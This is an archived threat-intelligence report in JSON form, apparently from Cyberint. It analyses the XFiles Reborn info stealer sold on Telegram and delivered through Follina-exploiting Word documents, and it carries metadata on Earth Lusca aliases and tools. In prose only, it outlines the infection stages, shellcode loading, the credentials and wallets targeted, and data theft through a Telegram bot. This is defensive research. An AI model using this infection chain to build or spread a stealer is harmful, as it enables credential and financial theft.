{ "id": "a573a31d-b9fb-472d-a3ac-5fb49efef3be", "created_at": "2026-04-06T01:32:07.23764Z", "updated_at": "2026-04-10T03:36:47.962804Z", "deleted_at": null, "sha1_hash": "8b29022bf08e55ce7e7533bf762eaa1193039587", "title": "XFiles Stealer Campaign Abusing Follina", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 54622, "plain_text": "XFiles Stealer Campaign Abusing Follina\r\nBy Shmuel Gihon\r\nPublished: 2022-07-03 · Archived: 2026-04-06 00:21:17 UTC\r\nResearch\r\nExecutive Summary\r\nAs many threat actors and groups seek to utilize recently discovered vulnerabilities, the Cyberint Research Team\r\nfound several XFiles stealer campaigns, in which Follina vulnerability was exploited as part of the delivery phase.\r\nFollina is one of the most widespread vulnerabilities discovered throughout 2022. The vulnerability allows a threat\r\nactor to perform a remote code execution (RCE) through malicious Word documents.\r\nXFiles stealer is a vastly used info stealer that took off during the end of 2021. The group that sells the stealer is\r\nRussia-region based and is currently looking to expand.\r\nRecent evidence suggests that worldwide threat actors’ campaigns abuse the Follina vulnerability in order to\r\ndeliver the XFiles info stealer, which has become popular even among veterans.\r\nFigure 1: XFiles Reborn stealer ad on an underground forum\r\nPurchasing\r\nThis campaign consists of two major components. The delivery module includes the Follina exploits and the\r\nXFiles info stealer sample.\r\nFollina Exploits\r\nAs expected, once the Follina vulnerability was published, its use became widespread, due to its simple\r\nexploitation and massive effect when successful. Many exploit developers and underground vulnerability\r\nresearchers offered exploits abusing Follina, for sale or even for free (Figure 2, 3).\r\nFigure 2: Threat actor publishing fully undetected exploit builder for 3.5K USD.\r\nFigure 3: Exploit being advertised in a Telegram channel for free\r\nMost sellers offer malicious documents exploiting this vulnerability to fulfill the buyer’s end goal. The prices vary,\r\ndepending on the developer’s reputation and level of detection.\r\nXFiles Reborn Information Stealer\r\nhttps://cyberint.com/blog/research/xfiles-stealer-campaign-abusing-follina/\r\nPage 1 of 5\n\nXFiles developers currently operate several Telegram channels and bots to fully support their customers. They\r\nhave a news channel, updates channel, and shopping bot along with a direct chat with the seller and overall chat\r\nfor customers.\r\nThe subscription plans they currently offer are 5, 10, or 20 USD per week, month, or six months, respectively.\r\nXFiles Reborn Panel\r\nAlthough the XFiles Reborn group recommends using Telegram as a panel for the information gathering from the\r\nstealers, they also provide the ability to create a “classic” panel on a given C2 by the seller (Figure 4, 5).\r\nFigure 4: XFiles Reborn stealer’s panel login page\r\nXFiles Reborn Group\r\nThe XFiles Reborn group started its operations in March 2021.\r\nThe group reminds us of another fairly new, yet ambitious group, Jester [1], as they put many efforts into\r\npublicity. Additionally, they do the “extra mile” to make themselves unique compared to other info stealer\r\noperators. Simplicity and efficiency is the name of the game.\r\nBefore they had a respectable amount of subscribers to their Telegram channels, the XFiles Reborn group used to\r\nadvertise themselves on the notorious underground forum, “Lolz.Guru” (Figure 6).\r\nFigure 6: XFiles Reborn group’s first post on lolz.guru\r\nThreat Actors Recruitment\r\nAs for expanding their operation, it seems that they are constantly looking to recruit new members, mostly ones\r\nthat already have experience with info stealers.\r\nDuring the past year, a threat actor created a new info stealer named Whisper Project. The campaign went on for a\r\ncouple of months and started to get subscribers.\r\nWhisper Project was short-lived but looked very professional and seemed to have the potential to become quite\r\npopular. As XFiles Reborn was looking to expand, they made some efforts to recruit the individual responsible for\r\nWhisper Project. Once they were successful, the Whisper Project died with an announcement by the creator that\r\nhe had joined the XFiles Reborn team (Figure 7).\r\nFigure 7: Whisper Project creator announces shutting down the operation and joining XFiles Reborn\r\nPunisher Miner\r\nThis ambitious group is not only expanding its personnel but also adding new products to their shelves. Earlier\r\nthis year, they introduced the Punisher Miner (Figure 8).\r\nFigure 8: Punisher Miner’s advertisement on an underground forum\r\nhttps://cyberint.com/blog/research/xfiles-stealer-campaign-abusing-follina/\r\nPage 2 of 5\n\nThis miner seems to be fairly sophisticated, as it supports mining Monero, Toncoin and Ravecoin. The miner is\r\nalso packed with evasion techniques, such as hiding itself from the Task Manager, delaying execution on startup,\r\nand more. The purchasing and building process is all done via a dedicated Telegram bot that provides a built\r\nexecutable once the payment is done. The price of the Punisher Miner is 500 rubles, which is around 10 USD.\r\nXFiles Info Stealer\r\nAlthough they added the miner recently, the group’s flagship is still the info stealer. The stealer targets all\r\nChromium-based browsers, Opera, and Firefox browsers, including history, cookies, passwords and credit card\r\ninformation.\r\nAlso, the stealer seeks to obtain FTP, Telegram and Discord credentials. In addition, it targets predefined file types\r\nthat are located on the victim’s Desktop along with a screenshot. Other clients, such as Steam and crypto-wallets,\r\nare also targeted in the process.\r\nTechnical Analysis\r\nInitial Infection\r\nRecent campaigns suggest that the infection process consists of malicious .docx files containing an OLE object\r\npointing to the C2 server’s LoadingUpdate.html file (Figure 9).\r\nFigure 10: JavaScript code that exploits Follina\r\nFirst Stage\r\nThe HTML file contains a JavaScript code (Figure 10) that will exploit the Follina vulnerability in order to\r\ndownload the second infection stage from the C2, ChimLacUpdate.exe .\r\nFigure 10: JavaScript code that exploits Follina\r\nThe JavaScript code includes an encoded base64 string that, once decoded, reveals a PowerShell command that\r\nwill create persistence within the startup directory for the newly-downloaded file (Figure 11) and execute it.\r\nFigure 11: PowerShell command decoded\r\nSecond Stage\r\nThe second stage is a crucial part of the infection process. The ChimLacUpdate.exe file includes a shellcode\r\nrunner module. This module contains hardcoded encrypted shell code and an AES decryption key.\r\nOnce the shellcode is decrypted, it is executed within the same process via the VirtualProtect API call (Figure\r\n12) and loaded into an unprotected section within the running process.\r\nFigure 12: Shellcode extraction and execution decompiled function\r\nhttps://cyberint.com/blog/research/xfiles-stealer-campaign-abusing-follina/\r\nPage 3 of 5\n\nAs mentioned, this method is not new and is considered one of the simpler techniques to identify although it is\r\nenough for this particular stage.\r\nThe shellcode itself is another downloader from the same C2 that will load and execute the XFiles Reborn stealer\r\nsample.\r\nPost Infection\r\nThis part is pretty similar in most info stealers and XFiles is no different. It pursues Discord and Telegram\r\ncredentials, browsing information, such as cookies, passwords and history, FTP clients credentials and, of course,\r\ncrypto wallets.\r\nIn addition, the XFiles stealer looks for something less common: credit card information stored in browsing\r\napplications.\r\nFinally, in some cases, the stealer looks for particular files such as .txt and .pdf and gathers screenshots of\r\nthe victim’s machine.\r\nWorking Directory\r\nXFiles Reborn creates its working directory in the same path in which it is running, which in our case is the\r\n%APPDATA% directory. The working directory consists of two directories:\r\nGrabber – Contains all files stolen and crypto-wallets.\r\nBrowsers – Contains all browsing information divided into browser directories.\r\nThe PCInfo.txt file, which contains the system information of the victim’s machine (Figure 14), is also created\r\nwithin the working directory along with the captured screenshot.\r\nFigure 14: XFiles Reborn working directory\r\nData Exfiltration\r\nThe Data exfiltration stage is done via Telegram.\r\nTelegram has become very popular among the new info stealers introduced this year. XFiles Reborn abuses the\r\nsimplicity and efficiency of Telegram to get a free, highly anonymous C2 infrastructure.\r\nAt this stage, once the stealer has gathered all the necessary information, it dynamically creates a zip file (does not\r\nsave it locally) as a stream and sends it to the threat actor’s preconfigured Telegram bot (Figure 15).\r\nFigure 15: C2 Telegram bot presenting new logs notification\r\nConclusions\r\nThe discovery of the Follina vulnerability provided threat actors with a new tool to weaponize their delivery\r\nprocess. It is inevitable and obvious that these techniques will be seen in ongoing campaigns, especially when we\r\nhttps://cyberint.com/blog/research/xfiles-stealer-campaign-abusing-follina/\r\nPage 4 of 5\n\nobserve the info stealers industry.\r\nOver the past six months, the Cyberint Research Team has witnessed massive numbers of new info stealers\r\nintroduced to the market.\r\nThe trend of deploying C2 infrastructure using Telegram, which requires minimal effort on the part of the\r\noperators and developers, is taking over and lowering the level of skill that used to be required by threat actors in\r\norder to establish their own info stealer brand.\r\nCyberint Research Team is convinced that this trend will lead to many more threat actors and info stealers brands\r\nin the marketplaces, as other types of malware, such as RATs or even ransomware, follow the trend.\r\nReferences\r\n[1] https://cyberint.com/blog/research/jester-stealer/\r\nSource: https://cyberint.com/blog/research/xfiles-stealer-campaign-abusing-follina/\r\nhttps://cyberint.com/blog/research/xfiles-stealer-campaign-abusing-follina/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cyberint.com/blog/research/xfiles-stealer-campaign-abusing-follina/" ], "report_names": [ "xfiles-stealer-campaign-abusing-follina" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775439127, "ts_updated_at": 1775792207, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8b29022bf08e55ce7e7533bf762eaa1193039587.pdf", "text": "https://archive.orkl.eu/8b29022bf08e55ce7e7533bf762eaa1193039587.txt", "img": "https://archive.orkl.eu/8b29022bf08e55ce7e7533bf762eaa1193039587.jpg" } }